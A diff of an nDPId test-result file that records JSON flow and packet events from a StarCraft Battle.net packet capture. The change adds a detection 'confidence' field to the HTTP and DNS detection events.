 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"}
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"}
-00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"}
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"}
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1437389985821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1437389985821,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2kAAIARVovAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1437389985852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1437389985852,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2oAAIARVorAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"}
 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1437389985882,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1437389985882,"pkt":"IImEa8W6hCYVPnXECABFAAC0AABAAEARtYbAqAH+wKgBZAA12KwAoDk1miuBgAABAAQAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQABwAwABQABAAAAGwAlC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAllZGdlc3VpdGXAIcA2AAUAAQAAUvQAEQVhMTk2MQFnBmFrYW1hacAhwGcAAQABAAAAEwAEAuQucMBnAAEAAQAAABMABALkLms="}
-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -212,7 +212,7 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -223,94 +223,94 @@
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"}
